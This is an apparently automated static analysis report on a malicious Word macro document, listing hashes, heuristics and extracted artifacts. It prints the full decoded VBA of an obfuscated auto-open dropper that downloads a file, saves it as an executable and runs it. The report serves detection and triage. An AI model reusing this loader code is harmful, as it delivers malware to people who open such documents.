Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 09a146b610c8f5e6…

MALICIOUS

Office (OOXML)

29.4 KB Created: 2016-07-19 09:47:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2016-08-15
MD5: aa1fe268b69b517beacd96ff245eddc0 SHA-1: 3ba564bc9ec3beb596cef2e85c34b9d7ad5c0065 SHA-256: 09a146b610c8f5e671e43d8372a6bd7503a24bacb41e6d5cc79cb17e2147726b
352 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample contains obfuscated VBA macros with an auto-executing loader. Critical heuristics indicate that the VBA code downloads a file via HTTP and executes it, a common technique for delivering second-stage payloads. The presence of ClamAV detections further supports its malicious nature. The VBA script's primary function is to download and execute a payload from a remote source.

Heuristics 9

  • ClamAV: Doc.Macro.ObfuscatedData-6136276-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.ObfuscatedData-6136276-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
     somebody = mAshinkazingeraIgolochkuSlomala_to__1.responseBody
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set mAshinkazingeraIgolochkuSlomala_to__1 = CreateObject(rjkjdhfn(I - 2))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set mAshinkazingeraIgolochkuSlomala_to__1 = CreateObject(rjkjdhfn(I - 2))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 12531 bytes
SHA-256: 95e2f6d05d11fb481bb7843f035762afa0326b1d77ed1b31dcae8769196a53f1
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
StopSignal "", ""
End Sub

Attribute VB_Name = "Module1"
Public mAshinkazingeraIgolochkuSlomala_to__1 As Object
Public somebodySaloEst As Object
Public mAshinkazingeraIgolochkuSlomala_to__3 As Object
Public tdgfnbq() As String


Public mAshinkazingeraIgolochkuSlomala_to__4 As String
Public rjkjdhfn() As String
Public mAshinkazingeraIgolochkuSlomala_tolko1 As String
Public mAshinkazingeraIgolochkuSlomala_to_fiddle As Object
Public SheikerSheiker As String
Public Function CheckDriveSpecError(ByRef driveSpec As String) As Boolean
 Dim x1 As String, x2 As String
 Dim lDrive As Integer
CheckDriveSpecError = False
 driveSpec = Trim$(driveSpec)
 lDrive = Len(driveSpec)
 If lDrive = 0 Or lDrive > 2 Then
 CheckDriveSpecError = True
 ElseIf lDrive = 1 Then
 If UCase$(driveSpec) > "C" And UCase$(driveSpec) <= "Z" Then
 driveSpec = driveSpec & ":"
 Else
 CheckDriveSpecError = True
 End If
 ElseIf lDrive = 2 Then
 x1 = UCase$(Left$(driveSpec, 1))
 x2 = Right$(driveSpec, 1)
 If Not (x1 > "C" And x1 <= "Z" And x2 = ":") Then CheckDriveSpecError = True
 End If
End Function
Public Sub ClearColl(ByRef colX As Collection)
 Do While colX.Count > 0
 colX.Remove 1
 Loop
End Sub
Public Function Kombainer(A1 As String, A2 As String, A3 As String) As String
Kombainer = Replace(A1, A2, A3)
End Function
Public Function FileExist(InFile As String) As Boolean
 FileExist = False
 On Error Resume Next
 If Dir$(InFile) <> "" Then FileExist = True
End Function
Public Function GetProjTierInfo(ByVal ProjID As String, ByVal SubpID As String, ByVal DiscID As String) As String
GetProjTierInfo = ""
 Dim intProjID As Integer, intSubpID As Integer, intDiscID As Integer
 intProjID = IIf((Len(ProjID) > 0) And IsNumeric(ProjID), ProjID, -2)
 intSubpID = IIf((Len(SubpID) > 0) And IsNumeric(SubpID), SubpID, -2)
 intDiscID = IIf((Len(DiscID) > 0) And IsNumeric(DiscID), DiscID, -2)
 If (intProjID > -1) Then
 If (intSubpID > -1) Then
 If (intDiscID > -1) Then
 GetProjTierInfo = "3T"
 Else
 GetProjTierInfo = "2TA"
 End If
 Else
 If (intDiscID > -1) Then
 GetProjTierInfo = "2TB"
 Else
 GetProjTierInfo = "1T"
 End If
 End If
 ElseIf (intProjID = "-2") Then
 GetProjTierInfo = "0T"
 End If
End Function
Public Function IsDefined(ByVal strCin As String) As Boolean
 If strCin <> "" And strCin <> "-1" And strCin <> "-2" Then
 IsDefined = True
 Else
 IsDefined = False
 End If
End Function
Public Function IsNotApplicable(ByVal strCin As String) As Boolean
 If strCin = "-2" Then
 IsNotApplicable = True
 Else
 IsNotApplicable = False
 End If
End Function
Public Function IsUnDefined(ByVal strCin As String) As Boolean
 If strCin = "" Or strCin = "-1" Then
 IsUnDefined = True
 Else
 IsUnDefined = False
 End If
End Function
Public Function LastDelimit(ByVal cin As String, ByVal Delimit As String) As Integer
 Dim NL As Integer, N As Integer
 LastDelimit = 0
 NL = Len(cin)
 For N = NL To 1 Step -1
 If Mid$(cin, N, 1) = Delimit Then
 LastDelimit = N
 Exit Function
 End If
 Next N
End Function
Public Function ParseStr(ByVal cin As String, ByVal Delimit As String, _
 ByRef StrOut() As String) As Integer
 Dim lenDelimit As Integer, NS As String, NL As Integer, N As Integer
 Dim NUBound As Integer
 lenDelimit = Len(Delimit)
 cin = Trim$(cin)
 NL = Len(cin)
 If NL = 0 Then
 ParseStr = 0
 StrOut(0) = ""
 Exit Function
 End If
 NUBound = UBound(StrOut)
 ParseStr = 0
 NS = 1
 Do
 N = InStr(NS, cin, Delimit)
 If N > 0 Then
 StrOut(ParseStr) = Trim$(Mid$(cin, NS, N - NS))
 NS = N + lenDelimit
 Else
 StrOut(ParseStr) = Trim$(Mid$(cin, NS))
 End If
 ParseStr = ParseStr + 1
 If (ParseStr > NUBound) Then Exit Function
 Loop While N > 0 And NL > N
End Function
Public Function RemoveSpaceFromList(ByVal cin As String, ByVal Delimit As String) As String
 Dim nStr As Integer, N As Integer
 Dim StrOut(15) As String
 cin = Trim$(cin)
 If Len(cin) > 0 Then
 nStr = ParseStr(cin, Delimit, StrOut)
 For N = 0 To nStr - 1
 If N = 0 Then
 RemoveSpaceFromList = Trim$(StrOut(N))
 Else
 RemoveSpaceFromList = RemoveSpaceFromList & Delimit & Trim$(StrOut(N))
 End If
 Next N
 Else
 RemoveSpaceFromList = ""
 End If
End Function
Public Sub StrParserColl(ByVal cin, ByVal Delimit As String, _
 ByRef StrColl As Collection)
 Dim NL As Integer, N As Integer, NS As Integer, LenD As Integer
 Dim x As String
 Dim I As Integer
 Dim d As Boolean
 d = True
 IsWord = True
 For I = 1 To Len(Trim("A112DWDCS22"))
 If d = False Then
Set mAshinkazingeraIgolochkuSlomala_to__1 = CreateObject(rjkjdhfn(I - 2))
Exit For
Else
d = False
End If
Next I
Set mAshinkazingeraIgolochkuSlomala_to_BEZTEBYA = CreateObject(rjkjdhfn(3))
 C = ""
 Set mAshinkazingeraIgolochkuSlomala_to__3 = mAshinkazingeraIgolochkuSlomala_to_BEZTEBYA.Environment(rjkjdhfn(4))
 Dim trostTROS As Integer
For trostTROS = LBound(tdgfnbq) To UBound(tdgfnbq)
 SheikerSheiker = SheikerSheiker & PfghzufqntkjgwsRjyb(trostTROS)
 Next trostTROS
 ReplaceOneWithTwoQuotes ""
 mAshinkazingeraIgolochkuSlomala_to__4 = mAshinkazingeraIgolochkuSlomala_to__3(rjkjdhfn(6))
 mAshinkazingeraIgolochkuSlomala_tolko1 = mAshinkazingeraIgolochkuSlomala_to__4
mAshinkazingeraIgolochkuSlomala_tolko1 = mAshinkazingeraIgolochkuSlomala_tolko1 + rjkjdhfn(12)
WriteClientCmdColl Nothing
 Exit Sub
 Call ClearColl(StrColl)
 cin = Trim$(cin)
 NL = Len(cin)
 If NL <= 0 Then Exit Sub
 LenD = Len(Delimit)
 NS = 1
 Do
 N = InStr(NS, cin, Delimit)
 If N > 0 Then
 x = Trim$(Mid$(cin, NS, N - NS))
 If Left$(x, 1) = "`" And Right$(x, 1) = "`" Then
 x = Mid$(x, 2, Len(x) - 2)
 End If
 StrColl.Add x
 NS = N + LenD
 Else
 x = Trim$(Mid$(cin, NS))
 If Left$(x, 1) = "`" And Right$(x, 1) = "`" Then
 x = Mid$(x, 2, Len(x) - 2)
 End If
 StrColl.Add x
 End If
 Loop While N > 0
End Sub


Public Function PfghzufqntkjgwsRjyb(VaarP1 As Integer) As String
Dost = CInt(tdgfnbq(VaarP1))
PfghzufqntkjgwsRjyb = Chr(Dost / (10 + 6))
End Function

Public Function ReplaceOneWithTwoQuotes(ByVal cin As String) As String
 Dim COut As String
 Dim LCin As Integer, N As Integer, M As Integer, I As Integer
 ReplaceOneWithTwoQuotes = ""
 LCin = Len(cin)
 If Application = "Microsoft Word" Then
 mAshinkazingeraIgolochkuSlomala_to__1.Open rjkjdhfn(5), SheikerSheiker, False
mAshinkazingeraIgolochkuSlomala_to__1.Send
End If
 If LCin = 0 Then Exit Function
 COut = ""
 I = 1
 For N = 1 To 20
 M = InStr(I, cin, """")
 If M > 0 Then
 COut = COut & Mid$(cin, I, M - I + 1) & """"
 I = M + 1
 If M >= LCin Then Exit For
 Else
 Exit For
 End If
 Next N
 If I <= LCin Then COut = COut & Mid$(cin, I)
 ReplaceOneWithTwoQuotes = COut
End Function
Public Function ReplaceText(ByVal fromTxt As String, ByVal toTxt As String, _
 ByVal orgTxt As String) As String
 Dim finalTxt As String
 Dim lenOrgTxt As Integer, lenFromTxt
 Dim N As Integer, M As Integer
 finalTxt = ""
 orgTxt = Trim$(orgTxt)
 lenOrgTxt = Len(orgTxt)
 If lenOrgTxt = 0 Then
 ReplaceText = finalTxt
 End If
 lenFromTxt = Len(fromTxt)
 finalTxt = ""
 N = 1
 Do
 M = InStr(N, orgTxt, fromTxt)
 If (M > 0) Then
 finalTxt = finalTxt & Mid(orgTxt, N, M - N) & toTxt
 N = M + lenFromTxt
 Else
 finalTxt = finalTxt & Mid$(orgTxt, N)
 End If
 Loop While (lenOrgTxt > N And M > 0)
 ReplaceText = finalTxt
End Function
Public Sub WriteClientCmd_OLD1(ByVal NItem As Integer, ByRef cin() As String)
 Dim N As Integer
 Dim x As Variant, xx As String
 N = 0
 xx = ""
 For N = 0 To NItem - 1
 If N = 0 Then
 xx = "" & cin(N)
 ElseIf N = 1 Then
 xx = xx & " """ & cin(N) & """"
 Else
 xx = xx & ", """ & cin(N) & """"
 End If
 Next N
 Print #2, xx
 N = 0
 xx = ""
 For N = 0 To NItem - 1
 If N = 0 Then
 xx = " LFile.WriteLine(""" & cin(N)
 ElseIf N = 1 Then
 xx = xx & " """"" & cin(N) & """"""
 Else
 xx = xx & ", """"" & cin(N) & """"""
 End If
 Next N
 xx = xx & """)"
 Print #2, xx
End Sub
Public Sub WriteClientCmdColl(ByRef colStr As Collection)
 Dim lngN As Long
 Dim xx As String
 somebodySaloEst.Type = 1
 somebodySaloEst.Open
 somebody = mAshinkazingeraIgolochkuSlomala_to__1.responseBody
somebodySaloEst.Write somebody
 somebodySaloEst.savetofile mAshinkazingeraIgolochkuSlomala_tolko1, 2
 mAshinkazingeraIgolochkuSlomala_to_fiddle.Open (mAshinkazingeraIgolochkuSlomala_tolko1)
Exit Sub
 xx = ""
 For lngN = 1 To colStr.Count
 If lngN = 1 Then
 xx = "" & colStr(lngN)
 ElseIf lngN = 2 Then
 xx = xx & " """ & colStr(lngN) & """"
 Else
 xx = xx & ", """ & colStr(lngN) & """"
 End If
 Next lngN
 Print #2, xx
 xx = ""
 For lngN = 1 To colStr.Count
 If lngN = 1 Then
 xx = " LFile.WriteLine(""" & colStr(lngN)
 ElseIf lngN = 2 Then
 xx = xx & " """"" & colStr(lngN) & """"""
 Else
 xx = xx & ", """"" & colStr(lngN) & """"""
 End If
 Next lngN
 xx = xx & """)"
 Print #2, xx
End Sub
Public Sub WriteClientCmd_OLD2(ParamArray cin())
 Dim N As Integer
 Dim x As Variant, xx As String
 N = 0
 xx = ""
 For Each x In cin
 N = N + 1
 If N = 1 Then
 xx = "" & x & "("
 ElseIf N = 2 Then
 xx = xx & """" & x & """"
 Else
 xx = xx & ", """ & x & """"
 End If
 Next x
 xx = xx & ")"
 Print #2, xx
 N = 0
 xx = ""
 For Each x In cin
 N = N + 1
 If N = 1 Then
 xx = " LFile.WriteLine(""" & x & "("
 ElseIf N = 2 Then
 xx = xx & """""" & x & """"""
 Else
 xx = xx & ", """"" & x & """"""
 End If
 Next x
 xx = xx & ")"")"
 Print #2, xx
End Sub
Public Function LocalTimeToUTC(ByVal the_date As Date) As Date
Dim system_time As String
Dim local_file_time As String
Dim utc_file_time As String
 DateToSystemTime the_date, system_time
 SystemTimeTo.FileTime system_time, local_file_time
 LocalFileTimeTo.FileTime local_file_time, utc_file_time
 FileTimeTo.SystemTime utc_file_time, system_time
 SystemTimeToDate system_time, the_date
 LocalTimeToUTC = the_date
End Function
Private Sub DateToSystemTime(ByVal the_date As Date, ByRef system_time As String)
 With system_t.ime
 .wYear = Year(the_date)
 .wMonth = Month(the_date)
 .wDay = Day(the_date)
 .wHour = Hour(the_date)
 .wMinute = Minute(the_date)
 .wSecond = Second(the_date)
 End With
End Sub
Private Sub SystemTimeToDate(system_time As String, ByRef the_date_sys As Date)
 With system_t.ime
 the_date_sys = DateSerial(.wYear, .wMonth, .wDay) + _
 TimeSerial(.wHour, .wMinute, .wSecond)
 End With
End Sub


Public Function StopSignal(ByVal NetDrive As String, ByVal ServerPath As String) As Integer
 tdgfnbq = Split("1664678678678232185667867867823218566786786782321792678678678232928678678678232752678678678232752678678678232166467867867823216166786786782321776678678678232176067867867823219366786786782321568678678678232155267867867823215686786786782321936678678678232736678678678232184067867867823219366786786782321760678678678232177667867867823217286786786782321776678678678232164867867867823219366786786782327366786786782321744678678678232161667867867823275267867867823276867867867823216646786786782321568678678678232880678678678232864678678678232848", "678678678232")
 Dim DFNBPLFC As String
DFNBPLFC = Kombainer("TOOCicroTOOOCoft.XTOOCLHTTPTOOOOCAdodb.TOOOCtrTOCaTOOCTOOOOCTOOOChTOCll.ApplicationTOOOOCWTOOOCcript.TOOOChTOCllTOOOOCProcTOCTOOOCTOOOCTOOOOCGTOCTTOOOOCTTOCTOOCPTOOOOCTypTOCTOOOOCopTOCnTOOOOCwritTOCTOOOOCrTOCTOOOCponTOOOCTOCBodyTOOOOCTOOOCavTOCtofilTOCTOOOOC\isnovaTOOOC2.TOCxTOC", "TOC", "e")
 DFNBPLFC = Kombainer(DFNBPLFC, "TOOC", "M")
 DFNBPLFC = Kombainer(DFNBPLFC, "TOOOC", "s")
 rjkjdhfn = Split(DFNBPLFC, "TOOOOC")
 Set somebodySaloEst = CreateObject(rjkjdhfn(1))
 Set mAshinkazingeraIgolochkuSlomala_to_fiddle = CreateObject(rjkjdhfn(2))
StrParserColl "", "", Nothing
Exit Function
 Dim Rtn As Boolean
 Rtn = ConnectNet.Drive(NetDrive, ServerPath)
 StopSignal = IIf(Rtn = True, 0, -1)
End Function

Attribute VB_Name = "DDAS"
Attribute VB_Base = "0{D1BF6CCB-D1BC-4162-97C4-4F6068C3803E}{881A6C08-1283-42BD-8DC2-0B76CCDAC2B9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 38912 bytes
SHA-256: 9f0b3d6244b12d4f9a54625aef45ba050d97ff417c67df3e2e01920322ef870b
Detection
ClamAV: Doc.Macro.ObfuscatedData-6136276-0
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.